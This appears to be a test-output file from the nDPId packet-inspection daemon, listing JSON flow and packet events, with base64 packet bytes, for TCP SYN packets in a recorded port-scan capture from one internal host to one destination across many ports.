-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsOMAAADoG1bKsEAAIQA2GNIzSgBDdUoMYAAAAAGACDACsfgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060763,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_packet_id":1,"flow_last_seen":1278275060763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060763,"pkt":"ACYLMQczACWzv5HuCABFAAAsMaMAACoG7M+sEAAIQA2GNIzSBhTdUoMYAAAAAGACDAAmewAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060764,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_packet_id":1,"flow_last_seen":1278275060764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060764,"pkt":"ACYLMQczACWzv5HuCABFAAAsCNAAADYGCaOsEAAIQA2GNIzSA\/7dUoMYAAAAAGACDAAokQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAs4qIAADcGLtCsEAAIQA2GNIzTBALdU4MZAAAAAGACEAAkigAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsLe8AADIG6IOsEAAIQA2GNIzTITTdU4MZAAAAAGACDAALWAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAss7UAADIGYr2sEAAIQA2GNIzTFrfdU4MZAAAAAGACDAAV1QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wAAACUGUHKsEAAIQA2GNIzSBE7dUoMYAAAAAGACCAAsQQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsGdwAADgG9pasEAAIQA2GNIzS1w\/dUoMYAAAAAGACBABdfwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsiwEAAC0GkHGsEAAIQA2GNIzSDSvdUoMYAAAAAGACCAAjZAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsYX4AACoGvPSsEAAIQA2GNIzSJyndUoMYAAAAAGACDAAFZgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsvdoAACUGZZisEAAIQA2GNIzSAmjdUoMYAAAAAGACCAAuJwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsRewAADEG0YasEAAIQA2GNIzSBA\/dUoMYAAAAAGACCAAsgAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsi\/0AADsGgXWsEAAIQA2GNIzSHcvdUoMYAAAAAGACEAAKxAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsouwAADMGcoasEAAIQA2GNIzSJ+fdUoMYAAAAAGACEAAAqAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsu48AACwGYOOsEAAIQA2GNIzSGiTdUoMYAAAAAGACBAAaawAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAs1UEAADAGQzGsEAAIQA2GNIzSE5HdUoMYAAAAAGACBAAg\/gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsf\/4AADcGkXSsEAAIQA2GNIzSCRPdUoMYAAAAAGACEAAffAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAstkgAACkGaSqsEAAIQA2GNIzSIGLdUoMYAAAAAGACCAAQLQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAso8MAACYGfq+sEAAIQA2GNIzSB\/vdUoMYAAAAAGACDAAklAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAs1+sAACYGSoesEAAIQA2GNIzSBArdUoMYAAAAAGACDAAohQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsGmoAACUGCQmsEAAIQA2GNIzSB4\/dUoMYAAAAAGACCAApAAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsuV0AACkGZhWsEAAIQA2GNIzTBHvdU4MZAAAAAGACCAAsEQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAspJsAACsGeNesEAAIQA2GNIzTAw\/dU4MZAAAAAGACEAAlfQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsLg8AACoG8GOsEAAIQA2GNIzTGojdU4MZAAAAAGACDAASBAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 